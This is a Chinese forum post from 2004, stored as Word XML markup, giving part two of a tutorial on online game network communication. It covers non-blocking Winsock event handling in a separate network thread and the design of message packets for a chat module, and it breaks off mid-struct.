    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发短消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加为好友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前离线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>楼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发表于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2004-7-8 13:05  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只看该作者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络游戏通讯模型初探②</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大家知道，游戏需要不断循环处理游戏中的逻辑并进行游戏世界的绘制，上面所介绍的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理方式均是以阻塞方式进行，这样就违背了游戏的执行本质，可以想象，在客户端连接到服务器的过程中，你的游戏不能得到控制，这时如果玩家想取消连接或者做其他处理，甚至显示一个最基本的动态连接提示都不行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　所以我们需要用其他方式来处理网络通讯，使其不会与游戏主线相冲突，可能大家都会想到：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个网络线程来处理不就可以了？没错，我们可以创建一个专门用于网络通讯的子线程来解决这个问题。当然，我们游戏中多了一个线程，我们就需要做更多的考虑，让我们来看看如何创建网络通讯线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中，我们可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateThread()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来进行线程的创建，看看下面的代码片段：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dwThreadID;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HANDLE hThread = CreateThread( NULL, 0, NetThread/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络线程函式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*/, sSocket, 0, &amp;dwThreadID );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( hThread == NULL )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( "WinSocket Thread Create Error&amp;#33;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这里我们创建了一个线程，同时将我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入线程函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">DWORD WINAPINetThread(LPVOID lParam) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKET sSocket (SOCKET)lParam;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 xml:space="preserve">return 0; </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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NetThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是我们将来用于处理网络通讯的网络线程。那么，我们又如何把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的处理引入线程中？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　看看下面的代码片段：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HANDLE hEvent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>hEvent = CreateEvent(NULL,0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置异步通讯</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( WSAEventSelect( sSocket, hEvent,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>FD_ACCEPT|FD_CONNECT|FD_READ|FD_WRITE|FD_CLOSE ) ==SOCKET_ERROR )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Failed( "WinSocket EventSelect Error&amp;#33;");</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通过上面的设置之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数均会以非阻塞方式运行，也就是函数执行后会立即返回，这时网络通讯会以事件方式存储于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而不会停顿整支程式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　完成了上面的步骤之后，我们需要对事件进行响应与处理，让我们看看如何在网络线程中获得网络通讯所产生的事件消息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>WSAEnumNetworkEvents( sSocket, hEvent, &amp;SocketEvents );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if( SocketEvents.lNetworkEvents &amp;#33;= 0 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">switch( SocketEvents.lNetworkEvents )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case FD_ACCEPT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSANETWORKEVENTS SocketEvents;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case FD_CONNECT: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 xml:space="preserve">if( SocketEvents.iErrorCode[FD_CONNECT_BIT] == 0) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接成功后通知主线程（游戏线程）进行处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve">break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case FD_READ: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取网络数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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 xml:space="preserve">if( recv( sSocket, pBuffer, lLength, 0) == SOCKET_ERROR )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 xml:space="preserve">Failed( "WinSocket Recv Error&amp;#33;");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 xml:space="preserve">break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">case FD_WRITE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>case FD_CLOSE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通知主线程（游戏线程），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络已经断开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">default: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">break; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</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这里仅对网络连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(FD_CONNECT) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和读取数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(FD_READ) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行了简单模拟操作，但实际中网络线程接收到事件消息后，会对数据进行组织整理，然后再将数据回传给我们的游戏主线程使用，游戏主线程再将处理过的数据发送出去，这样一个往返就构成了我们网络游戏中的数据通讯，是让网络游戏动起来的最基本要素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　最后，我们来谈谈关于网络数据包（数据封包）的组织，网络游戏的数据包是游戏数据通讯的最基本单位，网络游戏一般不会用字节流的方式来进行数据传输，一个数据封包也可以看作是一条消息指令，在游戏进行中，服务器和客户端会不停的发送和接收这些消息包，然后将消息包解析转换为真正所要表达的指令意义并执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　互动与管理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　说到互动，对于玩家来说是与其他玩家的交流，但对于计算机而言，实现互动也就是实现数据消息的相互传递。前面我们已经了解过网络通讯的基本概念，它构成了互动的最基本条件，接下来我们需要在这个网络层面上进行数据的通讯。遗憾的是，计算机并不懂得如何表达玩家之间的交流，因此我们需要提供一套可让计算机了解的指令组织和解析机制，也就是对我们上面简单提到的网络数据包（数据封包）的处理机制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了能够更简单的给大家阐述网络数据包的组织形式，我们以一个聊天处理模块来进行讨论，看看下面的代码结构：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">struct tagMessage{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">long lType; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">long lPlayerID; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息指令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令相关的玩家标识</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">char strTalk[256]; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
